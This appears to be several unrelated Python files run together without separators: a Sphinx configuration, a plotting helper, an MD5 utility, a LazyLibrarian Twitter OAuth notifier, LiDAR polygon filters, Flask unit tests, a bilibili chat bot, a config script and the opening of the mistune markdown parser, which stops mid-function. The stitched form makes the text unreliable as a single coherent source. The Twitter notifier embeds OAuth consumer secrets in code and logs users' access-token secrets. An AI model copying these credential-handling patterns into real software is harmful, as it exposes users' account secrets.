#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'Stetl'
copyright = u'2013+, Just van den Broecke'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# NOTE: keep these in sync with the package's own version string.
# The short X.Y version.
version = '1.2-dev'
# The full version, including alpha/beta/rc tags.
release = '1.2-dev'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []

# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []


# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
# 'default' is the classic built-in theme; no third-party theme dependency.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'Stetldoc'


# -- Options for LaTeX output --------------------------------------------------

# Options passed through to the LaTeX builder; all defaults kept (empty dict).
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',

# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',

# Additional stuff for the LaTeX preamble.
#'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'Stetl.tex', u'Stetl Documentation',
   u'Just van den Broecke', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True


# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
# Section 1: user commands.
man_pages = [
    ('index', 'stetl', u'Stetl Documentation',
     [u'Just van den Broecke'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False


# -- Options for Texinfo output ------------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
  ('index', 'Stetl', u'Stetl Documentation',
   u'Just van den Broecke', 'Stetl', 'One line description of project.',
   'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

def plotHistory(plot_context, axes):
    """
    Draw the context's history series onto the axes, styled per the plot
    config, and register a legend entry when anything was drawn.

    @type plot_context: PlotContext  (assumed from usage — TODO confirm)
    @type axes: matplotlib.axes.Axes
    """
    config = plot_context.plotConfig()

    # Nothing to draw when history is disabled or there is no data.
    # Keep the short-circuit order: history_data is only touched when enabled.
    if (
        not config.isHistoryEnabled()
        or plot_context.history_data is None
        or plot_context.history_data.empty
    ):
        return

    history = plot_context.history_data
    style = config.historyStyle()

    drawn = axes.plot_date(
        x=history.index.values,
        y=history,
        color=style.color,
        alpha=style.alpha,
        marker=style.marker,
        linestyle=style.line_style,
        linewidth=style.width,
        markersize=style.size,
    )

    if drawn and style.isVisible():
        config.addLegendItem("History", drawn[0])

# -*- coding: UTF-8 -*-

"""
Desc: django util.
Note:

---------------------------------------
# 2016/04/30   kangtian         created

"""
from hashlib import md5


def gen_md5(content_str):
    """Return the hex MD5 digest of content_str.

    Accepts text or bytes. Text is encoded as UTF-8 first: on Python 3,
    hashlib's update() only accepts bytes, so the original crashed for
    any str input.
    """
    if isinstance(content_str, str):
        content_str = content_str.encode('utf-8')
    m = md5()
    m.update(content_str)
    return m.hexdigest()

# Author: Nic Wolfe <nic@wolfeden.ca>
# URL: http://code.google.com/p/lazylibrarian/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard.  If not, see <http://www.gnu.org/licenses/>.

import lazylibrarian

from lazylibrarian import logger, common, formatter

# parse_qsl moved to urlparse module in v2.6
# parse_qsl moved to urlparse module in v2.6
try:
    from urlparse import parse_qsl  # @UnusedImport
except ImportError:
    # Python < 2.6: fall back to the cgi module's implementation.
    # Narrowed from a bare `except:` so unrelated errors aren't swallowed.
    from cgi import parse_qsl  # @Reimport

import lib.oauth2 as oauth
import lib.pythontwitter as twitter

class TwitterNotifier:
    """Sends LazyLibrarian notifications to Twitter via OAuth.

    The temp/access token pair is persisted in
    ``lazylibrarian.TWITTER_USERNAME`` / ``TWITTER_PASSWORD`` between the
    authorization step and the access-token exchange.
    """

    # NOTE(review): application (consumer) credentials hard-coded as shipped
    # with the original Sick Beard code.
    consumer_key = "208JPTMMnZjtKWA4obcH8g"
    consumer_secret = "BKaHzaQRd5PK6EH8EqPZ1w8mz6NSk9KErArarinHutk"
    
    REQUEST_TOKEN_URL = 'https://api.twitter.com/oauth/request_token'
    ACCESS_TOKEN_URL  = 'https://api.twitter.com/oauth/access_token'
    AUTHORIZATION_URL = 'https://api.twitter.com/oauth/authorize'
    SIGNIN_URL        = 'https://api.twitter.com/oauth/authenticate'
    
    def notify_snatch(self, title):
        """Tweet a 'snatched' notification if enabled in the config."""
        if lazylibrarian.TWITTER_NOTIFY_ONSNATCH:
            self._notifyTwitter(common.notifyStrings[common.NOTIFY_SNATCH]+': '+title)

    def notify_download(self, title):
        """Tweet a 'download finished' notification if enabled in the config."""
        if lazylibrarian.TWITTER_NOTIFY_ONDOWNLOAD:
            self._notifyTwitter(common.notifyStrings[common.NOTIFY_DOWNLOAD]+': '+title)

    def test_notify(self):
        """Send a test tweet regardless of the USE_TWITTER setting."""
        return self._notifyTwitter("This is a test notification from LazyLibrarian / " + formatter.now(), force=True)

    def _get_authorization(self):
        """Request a temp token and return the URL the user must visit.

        Stores the temp token pair in lazylibrarian.TWITTER_USERNAME /
        TWITTER_PASSWORD; returns None when Twitter refuses the request.
        """
        signature_method_hmac_sha1 = oauth.SignatureMethod_HMAC_SHA1() #@UnusedVariable
        oauth_consumer             = oauth.Consumer(key=self.consumer_key, secret=self.consumer_secret)
        oauth_client               = oauth.Client(oauth_consumer)
    
        logger.info('Requesting temp token from Twitter')
    
        resp, content = oauth_client.request(self.REQUEST_TOKEN_URL, 'GET')
    
        if resp['status'] != '200':
            logger.info('Invalid respond from Twitter requesting temp token: %s' % resp['status'])
        else:
            request_token = dict(parse_qsl(content))
    
            lazylibrarian.TWITTER_USERNAME = request_token['oauth_token']
            lazylibrarian.TWITTER_PASSWORD = request_token['oauth_token_secret']
    
            return self.AUTHORIZATION_URL+"?oauth_token="+ request_token['oauth_token']
    
    def _get_credentials(self, key):
        """Exchange the stored temp token plus the user's PIN (*key*) for an
        access token; persist it and return True on success, False otherwise.
        """
        request_token = {}
    
        request_token['oauth_token'] = lazylibrarian.TWITTER_USERNAME
        request_token['oauth_token_secret'] = lazylibrarian.TWITTER_PASSWORD
        request_token['oauth_callback_confirmed'] = 'true'
    
        token = oauth.Token(request_token['oauth_token'], request_token['oauth_token_secret'])
        token.set_verifier(key)
    
        logger.info('Generating and signing request for an access token using key '+key)
    
        signature_method_hmac_sha1 = oauth.SignatureMethod_HMAC_SHA1() #@UnusedVariable
        oauth_consumer             = oauth.Consumer(key=self.consumer_key, secret=self.consumer_secret)
        logger.info('oauth_consumer: '+str(oauth_consumer))
        oauth_client  = oauth.Client(oauth_consumer, token)
        logger.info('oauth_client: '+str(oauth_client))
        resp, content = oauth_client.request(self.ACCESS_TOKEN_URL, method='POST', body='oauth_verifier=%s' % key)
        logger.info('resp, content: '+str(resp)+','+str(content))
    
        access_token  = dict(parse_qsl(content))
        logger.info('access_token: '+str(access_token))
    
        logger.info('resp[status] = '+str(resp['status']))
        if resp['status'] != '200':
            logger.error('The request for a token with did not succeed: '+str(resp['status']))
            return False
        else:
            logger.info('Your Twitter Access Token key: %s' % access_token['oauth_token'])
            logger.info('Access Token secret: %s' % access_token['oauth_token_secret'])
            lazylibrarian.TWITTER_USERNAME = access_token['oauth_token']
            lazylibrarian.TWITTER_PASSWORD = access_token['oauth_token_secret']
            return True
    
    
    def _send_tweet(self, message=None):
        """Post *message* using the stored credentials; True on success."""
        username=self.consumer_key
        password=self.consumer_secret
        access_token_key=lazylibrarian.TWITTER_USERNAME
        access_token_secret=lazylibrarian.TWITTER_PASSWORD
    
        logger.info(u"Sending tweet: "+message)
    
        api = twitter.Api(username, password, access_token_key, access_token_secret)
    
        try:
            api.PostUpdate(message)
        except Exception as e:
            # "except Exception, e" was Python-2-only syntax; "as" works on
            # both Python 2.6+ and Python 3.
            logger.error(u"Error Sending Tweet: %s" %e)
            return False
    
        return True
    
    def _notifyTwitter(self, message='', force=False):
        """Tweet "<prefix>: <message>" unless Twitter is disabled (or *force*)."""
        prefix = lazylibrarian.TWITTER_PREFIX
    
        if not lazylibrarian.USE_TWITTER and not force:
            return False
    
        return self._send_tweet(prefix+": "+message)

# NOTE(review): this binds the class itself, not an instance — callers must
# do TwitterNotifier() themselves. Confirm against this module's consumers;
# if they expect an object, the trailing "()" is missing here.
notifier = TwitterNotifier
import numpy as np
import laspy as las

# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False.  The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x, y, poly):
    """Ray-casting point-in-polygon test.

    :param x, y: coordinates of the query point.
    :param poly: list of (x, y) vertex pairs.
    :return: True if the point lies inside the polygon, else False.
    """
    edge_count = len(poly)
    odd_crossings = False

    ax, ay = poly[0]
    for k in range(1, edge_count + 1):
        bx, by = poly[k % edge_count]
        # Only edges whose y-span brackets the ray height, and whose
        # bounding box is not entirely left of the point, can be crossed.
        if min(ay, by) < y <= max(ay, by) and x <= max(ax, bx):
            if ay != by:
                # x coordinate where the horizontal ray meets this edge.
                crossing_x = (y - ay) * (bx - ax) / (by - ay) + ax
            if ax == bx or x <= crossing_x:
                odd_crossings = not odd_crossings
        ax, ay = bx, by

    return odd_crossings

# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing.  This saves a fair bit of looping.
def points_in_poly(x,y,poly):
    """Vectorised ray-casting point-in-polygon test.

    :param x, y: 1-D numpy arrays of point coordinates.
    :param poly: list of (x, y) vertex pairs describing the polygon.
    :return: (x_inside, y_inside, inside) — the coordinates of the points
        inside the polygon plus the boolean mask over the full input.
    """
    n = len(poly)
    inside=np.zeros(x.size,dtype=bool)
    xints=np.zeros(x.size)

    p1x,p1y = poly[0]
    for i in range(n+1):
        p2x,p2y=poly[i % n]
        # Mask of points whose y lies within the edge's span and whose x is
        # not right of the edge's bounding box. Hoisted so it is computed
        # once per edge instead of up to four times.
        band = np.all([y > min(p1y, p2y),
                       y <= max(p1y, p2y),
                       x <= max(p1x, p2x)], axis=0)
        if p1y!=p2y:
            # x coordinate where the horizontal ray at each point's y
            # crosses this edge (only meaningful for banded points).
            xints[band] = (y[band] - p1y) * (p2x - p1x) / (p2y - p1y) + p1x
        if p1x==p2x:
            # Vertical edge: every banded point's ray crosses it.
            inside[band] = np.invert(inside[band])
        else:
            crossed = band & (x <= xints)
            inside[crossed] = np.invert(inside[crossed])
        p1x,p1y = p2x,p2y

    return x[inside],y[inside], inside

# This retrieves all points within circular neighbourhood,  Terget point is the location around which the neighbourhood search is conducted, for a specified search radius.  x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
    """Return the points of (x, y) lying within *radius* of the target.

    :param x, y: 1-D numpy arrays of candidate coordinates.
    :param target_x, target_y: centre of the circular neighbourhood.
    :param radius: search radius (inclusive boundary).
    :return: (x_inside, y_inside, inside) where *inside* is the boolean mask.
    """
    # Compare squared distances — avoids a needless sqrt per point.
    # (The original also pre-allocated `inside` and immediately overwrote
    # it; that dead store is removed.)
    d2=(x-target_x)**2+(y-target_y)**2
    inside = d2<=radius**2
    return x[inside],y[inside], inside

# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
    """Return the rows of *in_pts* falling inside *polygon*.

    With filter_by_first_return_location=True the polygon test is run on
    first returns only (column 3 == 1) and every return sharing a selected
    pulse's GPS time (column 6) is kept — useful at polygon edges in
    multi-return analyses.
    """
    pts = np.zeros((0, in_pts.shape[1]))
    if in_pts.shape[0] > 0:
        if filter_by_first_return_location:
            # Test only the first returns against the polygon.
            first_return_mask = in_pts[:, 3] == 1
            x, y, hits = points_in_poly(in_pts[first_return_mask, 0],
                                        in_pts[first_return_mask, 1],
                                        polygon)
            # Column 6 holds GPS time; gather every return from the
            # selected pulses.
            pulse_times = np.unique(in_pts[first_return_mask, 6][hits])
            inside = np.in1d(in_pts[:, 6], pulse_times)
            x = in_pts[inside, 0]
            y = in_pts[inside, 1]
        else:
            x, y, inside = points_in_poly(in_pts[:, 0], in_pts[:, 1], polygon)
        pts = in_pts[inside, :]
    else:
        print("\t\t\t no points in polygon")
    return pts

# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
    """Return the rows of *in_pts* within *radius* of target_xy = (x, y)."""
    selected = np.zeros((0, in_pts.shape[1]))
    if in_pts.shape[0] > 0:
        x, y, mask = points_in_radius(in_pts[:, 0], in_pts[:, 1],
                                      target_xy[0], target_xy[1], radius)
        selected = in_pts[mask, :]
    else:
        print( "\t\t\t no points in neighbourhood")
    return selected

from flask import json
from unittest.mock import patch, Mock

from urbansearch.gathering.indices_selector import IndicesSelector
from urbansearch.server.main import Server
from urbansearch.server import classify_documents
from urbansearch.server.classify_documents import _join_workers
from urbansearch.workers import Workers

# Module-level Server shared by all tests below; run=False presumably keeps
# the server from actually starting on import — confirm in Server.__init__.
s = Server(run=False)

@patch('urbansearch.server.classify_documents._join_workers')
@patch.object(Workers, 'run_classifying_workers')
@patch.object(IndicesSelector, 'run_workers')
def test_download_indices_for_url(mock_run_workers, mock_run_classifying, mock_join):
    """The log_only endpoint should start and join the worker pipeline.

    Note: @patch decorators inject bottom-up, so the first parameter is the
    innermost patch (IndicesSelector.run_workers) — the original names were
    swapped relative to that order.
    """
    with s.app.test_client() as c:
        # Only the side effects on the mocked workers matter; the HTTP
        # response body is not inspected (the original bound it to an
        # unused `resp`).
        c.get('/api/v1/classify_documents/log_only?directory=test')

        assert mock_run_workers.called
        assert mock_run_classifying.called
        assert mock_join.called


@patch('urbansearch.server.classify_documents._join_workers')
@patch.object(Workers, 'run_classifying_workers')
@patch.object(IndicesSelector, 'run_workers')
def test_classify_indices_to_db(mock_run_workers, mock_run_classifying, mock_join):
    """The to_database endpoint should start and join the worker pipeline.

    Parameters are named in @patch's bottom-up injection order; the unused
    `resp` binding from the original is dropped.
    """
    with s.app.test_client() as c:
        c.get('/api/v1/classify_documents/to_database?directory=test')

        assert mock_run_workers.called
        assert mock_run_classifying.called
        assert mock_join.called


@patch('urbansearch.server.classify_documents._join_workers')
@patch('urbansearch.server.classify_documents.db_utils')
def test_classify_indices_to_db_no_connection(mock_db, mock_jw):
    """Without a database connection no workers should be joined."""
    mock_db.connected_to_db.return_value = False

    with s.app.test_client() as c:
        # Response body is irrelevant (the original bound it to an unused
        # `resp`); only the absence of the join call matters.
        c.get('/api/v1/classify_documents/to_database?directory=test')
        assert not mock_jw.called


@patch('urbansearch.server.classify_documents._join_file_workers')
@patch.object(Workers, 'run_classifying_workers')
@patch.object(Workers, 'run_read_files_worker')
def test_classify_textfiles_to_db(mock_read_worker, mock_classify_worker, mock_join):
    """classify_textfiles_to_db wires up readers, classifiers and join."""
    classify_documents.classify_textfiles_to_db(0, 'test')

    assert mock_read_worker.called
    assert mock_classify_worker.called
    assert mock_join.called


@patch('urbansearch.server.classify_documents._join_workers')
@patch('urbansearch.server.classify_documents.db_utils')
def test_classify_textfiles_to_db_no_connection(mock_db, mock_join):
    """Without a database connection classification must not join workers."""
    mock_db.connected_to_db.return_value = False
    classify_documents.classify_textfiles_to_db(0, None)
    assert not mock_join.called


def test_join_workers():
    """_join_workers joins producers, toggles the done flag, joins consumers."""
    producer_mocks = [Mock()]
    consumer_worker = Mock()
    consumer_mocks = [Mock()]

    classify_documents._join_workers(consumer_worker, producer_mocks, consumer_mocks)

    assert all(p.join.called for p in producer_mocks)
    assert consumer_worker.set_producers_done.called
    assert all(c.join.called for c in consumer_mocks)
    assert consumer_worker.clear_producers_done.called


def test_join_file_workers():
    """_join_file_workers mirrors _join_workers for the file-based pipeline."""
    producer_mocks = [Mock()]
    consumer_worker = Mock()
    consumer_mocks = [Mock()]

    classify_documents._join_file_workers(consumer_worker, producer_mocks, consumer_mocks)

    assert all(p.join.called for p in producer_mocks)
    assert consumer_worker.set_file_producers_done.called
    assert all(c.join.called for c in consumer_mocks)
    assert consumer_worker.clear_file_producers_done.called

#-*- coding:utf-8 -*-

from findbilibili import *

#function name [checkinfo2]
#判断要输出的回答
#param array 抓取的文字
#return string 回答
def checkinfo2(content):
    """Decide the reply for a scraped message (Python 2 byte-string code).

    :param content: mutable sequence of scraped strings; content[1] is the
        keyword — assumed GBK-encoded bytes (Python 2 str), TODO confirm.
    :return: reply string — a canned answer for the special keyword, else
        the anime search result.
    """
    # Transcode the keyword GBK -> unicode -> UTF-8 bytes so it can be
    # compared against the UTF-8 literals below; mutates content[1].
    content[1] = content[1].decode('gbk')
    key = content[1].encode('utf-8')
    if key == '节操':
        return '这种东西早就没有了'


    result = animation(key)    # search for the anime
    return result
    

#function name [animation]
#搜索动漫
#param array 动漫名字
#return string 最后更新网址
def animation(name):
    """Search bilibili for *name* and report its latest episode update.

    Returns a "nothing found" message when the search yields no episodes.
    """
    episodes = bilibili(name)
    try:
        latest = episodes[-1]
        return 'bilibili最后更新:第' + latest[0] + '集' + latest[1]
    except IndexError:
        return '什么都找不到！'
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-

__author__ = """Co-Pierre Georg (co-pierre.georg@uct.ac.za)"""

import sys
from src.paralleltools import Parallel

#-------------------------------------------------------------------------
#
#  conftools.py is a simple module to manage .xml configuration files
#
#-------------------------------------------------------------------------
if __name__ == '__main__':

    # -- variables -------------------------------------------------------
    args = sys.argv
    if len(args) < 2:
        # The original crashed with IndexError when no argument was given.
        sys.exit("Usage: %s <config_file_name>" % args[0])
    config_file_name = args[1]

    # -- code ------------------------------------------------------------
    # Generate the per-run .xml configuration files.
    parallel = Parallel()
    parallel.create_config_files(config_file_name)

# coding: utf-8
"""
    mistune
    ~~~~~~~

    The fastest markdown parser in pure Python with renderer feature.

    :copyright: (c) 2014 - 2016 by Hsiaoming Yang.
"""

import re
import inspect

__version__ = '0.7.3'
__author__ = 'Hsiaoming Yang <me@lepture.com>'
__all__ = [
    'BlockGrammar', 'BlockLexer',
    'InlineGrammar', 'InlineLexer',
    'Renderer', 'Markdown',
    'markdown', 'escape',
]


# Collapses whitespace runs when normalising link/footnote keys (_keyify).
_key_pattern = re.compile(r'\s+')
_nonalpha_pattern = re.compile(r'\W')
# Ampersands that do not already start an HTML entity (smart escaping).
_escape_pattern = re.compile(r'&(?!#?\w+;)')
# CR / CRLF line endings, normalised to LF in preprocessing().
_newline_pattern = re.compile(r'\r\n|\r')
# Leading "> " markers of a block quote, stripped per line.
_block_quote_leading_pattern = re.compile(r'^ *> ?', flags=re.M)
# Four-space indent introducing an indented code block, stripped per line.
_block_code_leading_pattern = re.compile(r'^ {4}', re.M)
# Tags treated as inline-level HTML.
_inline_tags = [
    'a', 'em', 'strong', 'small', 's', 'cite', 'q', 'dfn', 'abbr', 'data',
    'time', 'code', 'var', 'samp', 'kbd', 'sub', 'sup', 'i', 'b', 'u', 'mark',
    'ruby', 'rt', 'rp', 'bdi', 'bdo', 'span', 'br', 'wbr', 'ins', 'del',
    'img', 'font',
]
# Tags whose content must not be parsed as Markdown.
_pre_tags = ['pre', 'script', 'style']
_valid_end = r'(?!:/|[^\w\s@]*@)\b'
_valid_attr = r'''\s*[a-zA-Z\-](?:\=(?:"[^"]*"|'[^']*'|\d+))*'''
# Any tag name that is NOT in _inline_tags, i.e. a block-level tag.
_block_tag = r'(?!(?:%s)\b)\w+%s' % ('|'.join(_inline_tags), _valid_end)
# URL schemes rejected by escape_link().
_scheme_blacklist = ('javascript:', 'vbscript:')


def _pure_pattern(regex):
    pattern = regex.pattern
    if pattern.startswith('^'):
        pattern = pattern[1:]
    return pattern


def _keyify(key):
    return _key_pattern.sub(' ', key.lower())


def escape(text, quote=False, smart_amp=True):
    """Replace special characters "&", "<" and ">" with HTML-safe sequences.

    :param quote: if set to True, " and ' are escaped as well.
    :param smart_amp: if set to False every & is escaped; otherwise only
        ampersands that do not already begin an entity.
    """
    if smart_amp:
        # Leave existing entities (&amp;, &#39;, ...) untouched.
        text = re.sub(r'&(?!#?\w+;)', '&amp;', text)
    else:
        text = text.replace('&', '&amp;')
    text = text.replace('<', '&lt;').replace('>', '&gt;')
    if quote:
        text = text.replace('"', '&quot;').replace("'", '&#39;')
    return text


def escape_link(url):
    """Drop URLs using a blacklisted scheme; HTML-escape everything else."""
    normalized = url.lower().strip('\x00\x1a \n\r\t')
    # str.startswith accepts a tuple — one call covers the whole blacklist.
    if normalized.startswith(_scheme_blacklist):
        return ''
    return escape(url, quote=True, smart_amp=False)


def preprocessing(text, tab=4):
    """Normalise input: LF line endings, tabs expanded to *tab* columns,
    unicode spaces replaced, and space-only lines blanked."""
    text = re.sub(r'\r\n|\r', '\n', text)
    text = text.expandtabs(tab)
    text = text.replace('\u00a0', ' ').replace('\u2424', '\n')
    return re.sub(r'^ +$', '', text, flags=re.M)


class BlockGrammar(object):
    """Grammars for block level tokens."""

    # [key]: <link> "optional title"
    def_links = re.compile(
        r'^ *\[([^^\]]+)\]: *'  # [key]:
        r'<?([^\s>]+)>?'  # <link> or link
        r'(?: +["(]([^\n]+)[")])? *(?:\n+|$)'
    )
    # [^key]: footnote body (may continue over indented lines)
    def_footnotes = re.compile(
        r'^\[\^([^\]]+)\]: *('
        r'[^\n]*(?:\n+|$)'  # [^key]:
        r'(?: {1,}[^\n]*(?:\n+|$))*'
        r')'
    )

    # One or more blank lines.
    newline = re.compile(r'^\n+')
    # Indented (4-space) code block.
    block_code = re.compile(r'^( {4}[^\n]+\n*)+')
    # Fenced code block (``` or ~~~) with optional language tag.
    fences = re.compile(
        r'^ *(`{3,}|~{3,}) *(\S+)? *\n'  # ```lang
        r'([\s\S]+?)\s*'
        r'\1 *(?:\n+|$)'  # ```
    )
    # Horizontal rule: three or more -, * or _.
    hrule = re.compile(r'^ {0,3}[-*_](?: *[-*_]){2,} *(?:\n+|$)')
    # ATX heading: "# Heading".
    heading = re.compile(r'^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)')
    # Setext heading: text underlined with === or ---.
    lheading = re.compile(r'^([^\n]+)\n *(=|-)+ *(?:\n+|$)')
    # "> quoted" block.
    block_quote = re.compile(r'^( *>[^\n]+(\n[^\n]+)*\n*)+')
    # Whole bullet/ordered list, terminated by hrule/definition/blank runs.
    list_block = re.compile(
        r'^( *)([*+-]|\d+\.) [\s\S]+?'
        r'(?:'
        r'\n+(?=\1?(?:[-*_] *){3,}(?:\n+|$))'  # hrule
        r'|\n+(?=%s)'  # def links
        r'|\n+(?=%s)'  # def footnotes
        r'|\n{2,}'
        r'(?! )'
        r'(?!\1(?:[*+-]|\d+\.) )\n*'
        r'|'
        r'\s*$)' % (
            _pure_pattern(def_links),
            _pure_pattern(def_footnotes),
        )
    )
    # A single item within a list block (multiline mode).
    list_item = re.compile(
        r'^(( *)(?:[*+-]|\d+\.) [^\n]*'
        r'(?:\n(?!\2(?:[*+-]|\d+\.) )[^\n]*)*)',
        flags=re.M
    )
    # The bullet marker itself, used for stripping.
    list_bullet = re.compile(r'^ *(?:[*+-]|\d+\.) +')
    # Plain paragraph: runs until any other block construct starts.
    paragraph = re.compile(
        r'^((?:[^\n]+\n?(?!'
        r'%s|%s|%s|%s|%s|%s|%s|%s|%s'
        r'))+)\n*' % (
            _pure_pattern(fences).replace(r'\1', r'\2'),
            _pure_pattern(list_block).replace(r'\1', r'\3'),
            _pure_pattern(hrule),
            _pure_pattern(heading),
            _pure_pattern(lheading),
            _pure_pattern(block_quote),
            _pure_pattern(def_links),
            _pure_pattern(def_footnotes),
            '<' + _block_tag,
        )
    )
    # Raw block-level HTML: comment, paired tag, or self-closing tag.
    block_html = re.compile(
        r'^ *(?:%s|%s|%s) *(?:\n{2,}|\s*$)' % (
            r'<!--[\s\S]*?-->',
            r'<(%s)((?:%s)*?)>([\s\S]*?)<\/\1>' % (_block_tag, _valid_attr),
            r'<%s(?:%s)*?\s*\/?>' % (_block_tag, _valid_attr),
        )
    )
    # Table whose rows start with a pipe.
    table = re.compile(
        r'^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*'
    )
    # Table without leading pipes.
    nptable = re.compile(
        r'^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*'
    )
    # Fallback: one line of plain text.
    text = re.compile(r'^[^\n]+')


class BlockLexer(object):
    """Block level lexer for block grammars."""
    grammar_class = BlockGrammar

    # Rules tried, in order, for top-level text.
    default_rules = [
        'newline', 'hrule', 'block_code', 'fences', 'heading',
        'nptable', 'lheading', 'block_quote',
        'list_block', 'block_html', 'def_links',
        'def_footnotes', 'table', 'paragraph', 'text'
    ]

    # Restricted rule set used when recursing into list items.
    list_rules = (
        'newline', 'block_code', 'fences', 'lheading', 'hrule',
        'block_quote', 'list_block', 'block_html', 'text',
    )

    # Rule set used when recursing into footnote bodies.
    footnote_rules = (
        'newline', 'block_code', 'fences', 'heading',
        'nptable', 'lheading', 'hrule', 'block_quote',
        'list_block', 'block_html', 'table', 'paragraph', 'text'
    )

    def __init__(self, rules=None, **kwargs):
        """Create a block lexer.

        :param rules: a grammar instance; defaults to ``grammar_class()``.
        """
        self.tokens = []
        self.def_links = {}
        self.def_footnotes = {}

        if not rules:
            rules = self.grammar_class()

        self.rules = rules

    def __call__(self, text, rules=None):
        """Shortcut for :meth:`parse`."""
        return self.parse(text, rules)

    def parse(self, text, rules=None):
        """Tokenize *text*, appending to and returning ``self.tokens``.

        :param rules: rule names to try in priority order; defaults to
            ``default_rules``.
        """
        text = text.rstrip('\n')

        if not rules:
            rules = self.default_rules

        def manipulate(text):
            # First matching rule wins; its parse_* handler emits token(s).
            for key in rules:
                rule = getattr(self.rules, key)
                m = rule.match(text)
                if not m:
                    continue
                getattr(self, 'parse_%s' % key)(m)
                return m
            return False  # pragma: no cover

        while text:
            m = manipulate(text)
            if m is not False:
                text = text[len(m.group(0)):]
                continue
            if text:  # pragma: no cover
                raise RuntimeError('Infinite loop at: %s' % text)
        return self.tokens

    def parse_newline(self, m):
        """Emit a 'newline' token for runs of two or more newlines."""
        length = len(m.group(0))
